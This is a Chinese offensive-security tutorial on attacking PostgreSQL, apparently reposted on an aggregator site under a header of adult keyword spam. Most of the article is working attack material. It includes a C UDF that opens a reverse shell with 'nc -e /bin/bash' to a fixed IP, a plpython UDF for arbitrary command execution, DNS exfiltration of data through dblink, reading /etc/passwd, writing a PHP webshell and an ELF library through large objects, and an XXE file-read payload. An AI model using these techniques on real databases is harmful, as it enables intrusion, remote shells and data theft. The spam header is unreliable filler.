日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 运维知识 > 数据库 >内容正文

数据库

Hacking PostgreSQL

發布時間:2025/4/5 数据库 32 豆豆
生活随笔 收集整理的這篇文章主要介紹了 Hacking PostgreSQL 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

Ricter · 2015/06/04 10:16

這篇文章主要講解了如何 Hacking PostgreSQL 數據庫,總結了一些常用方法。

0x01 SQL 注入


大體上和 MySQL 差不多,有一些變量不一樣。具體就不再舉例,可以看這篇總結:PostgreSQL SQL Injection Cheat Sheet。
此外,利用 sqlmap 也是一個不錯的方式。

0x02 執行命令


C

sqlmap 給出的幾個 UDF 在我本地測試并不成功,所以最好的方法是自己編譯一個動態鏈接庫。
根據官方文檔,我們要定義一個 PG_MODULE_MAGIC。在 PostgreSQL 這個是為了 Postgresql 的安全機制(大概?),在 8.2 以后需要驗證這個 magic block,不然,在加在動態鏈接庫的時候會報錯:

ERROR: incompatible library "xxx.so": missing magic block HINT: Extension libraries are required to use the PG_MODULE_MAGIC macro. 復制代碼

執行系統命令的動態鏈接庫源碼為:

#!c++ #include "postgres.h" #include "fmgr.h" #include <stdlib.h>#ifdef PG_MODULE_MAGIC PG_MODULE_MAGIC; #endiftext *exec() {system("nc -e /bin/bash 10.211.55.2 9999"); } 復制代碼

利用如下命令編譯 .so 文件:

#!bash gcc 1.c -I`pg_config --includedir-server` -fPIC -shared -o udf.so 復制代碼

在 pgsql 里執行:

#!sql CREATE OR REPLACE FUNCTION exec() RETURNS text AS '/tmp/1.so', 'exec' LANGUAGE C STRICT; select exec(); 復制代碼

監聽的 9999 端口得到一個 shell:

Python

默認 PostgreSQL 不會安裝 Python 的擴展,在 Ubuntu 下可以通過:

#!bash apt-get install postgresql-plpython-9.1 復制代碼

進行安裝,除了 python 的擴展,還有 sh、perl、ruby 等等。
安裝完成后,首先是創建一個 UDF 來執行我們要執行的命令:

#!sql CREATE FUNCTION system (a text)RETURNS text AS $$import osreturn os.popen(a).read() $$ LANGUAGE plpython2u; 復制代碼

其中的 plpython2u 可以利用如下語句獲取:

select * from pg_language; 復制代碼

我們可以根據返回來判斷利用哪個語言(plpython2u、plpythonu、plpython3u 等等)。

創建好 UDF 后,直接調用如下語句即可:

#!sql select system('ls -la'); 復制代碼

此外,sh、ruby 等同理,可以參考官方文檔來寫一個 UDF。

文檔地址:www.postgresql.org/docs/8.2/st…

0x03 DNS 請求獲取數據


同樣的,PostgreSQL 可以通過 DNS Request 一樣獲取數據,在盲注的情況下。用到的一個擴展叫做 dblink,可以通過如下命令開啟:

#!sql CREATE EXTENSION dblink 復制代碼

接著運行如下語句,獲取當前數據庫用戶名稱:

#!sql SELECT * FROM dblink('host='||(select user)||'.f27558c1f94c0595.xxxxx.xx user=someuser dbname=somedb', 'SELECT version()') RETURNS (result TEXT); 復制代碼

遠程獲取到請求內容:

0x04 讀寫文件


PostgreSQL 讀取文件雖然有些蛋疼,但是還是可以讀取的:

#!sql CREATE TABLE temptable(t text); COPY temptable FROM '/etc/passwd'; SELECT * FROM temptable limit 1 offset 0; 復制代碼

讀取結束后:

#!sql DROP TABLE temptable; 復制代碼

寫文件分為兩個部分,一個是寫 webshell,另外一個是寫二進制文件。
寫 webshell 十分簡單,利用:

#!php COPY (select '<?php phpinfo();?>') to '/tmp/1.php'; 復制代碼

即可寫一個文件。
根據瘋狗的這一篇帖子:zone.wooyun.org/content/497…,說是可以利用 PostgreSQL 的“大對象數據”來寫,但是我測試是失敗的。報錯如下:

#!bash ERROR: pg_largeobject entry for OID 2008, page 0 has invalid data field size 2378 復制代碼

用 COPY 的 FORMAT 位 binary 來寫文件的話,會被 PostgreSQL 加上幾個字節,導致不能識別為 ELF 文件。
實際上,閱讀官方文檔可知,寫的文件每一頁不能超過 2KB,所以我們要把數據分段:

#!sql SELECT lo_create(12345); INSERT INTO pg_largeobject VALUES (12345, 0, decode('7f454c4...0000', 'hex')); INSERT INTO pg_largeobject VALUES (12345, 1, decode('0000000...0000', 'hex')); INSERT INTO pg_largeobject VALUES (12345, 2, decode('f604000...0000', 'hex')); INSERT INTO pg_largeobject VALUES (12345, 3, decode('0000000...7400', 'hex')); SELECT lo_export(12345, '/tmp/test.so'); SELECT lo_unlink(12345); 復制代碼

其中每一段都要小于等于 2KB,這樣就可以成功寫入:

0x05 XXE


老版本的 PostgreSQL 存在 XXE 漏洞。具體可以看這篇文章:PostgreSQL (all) error-based XXE 0day。
大體就是執行語句:

#!sql select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc;</content>'); 復制代碼

可以獲取一些數據,也可以進行 SSRF 等。不過因為年代很久,可能很多都修復過了,所以作為一個保留方案,可能會有意外的驚喜。

參考


  • PostgreSQL SQL Injection Cheat Sheet
  • 關于PostgreSQL的那些事兒(文件讀取寫入、命令執行的辦法)
  • PostgreSQL 9.0 Documentation
  • PostgreSQL (all) error-based XXE 0day
  • 最后,如有錯誤請不吝賜教。

    總結

    以上是生活随笔為你收集整理的Hacking PostgreSQL的全部內容,希望文章能夠幫你解決所遇到的問題。

    如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。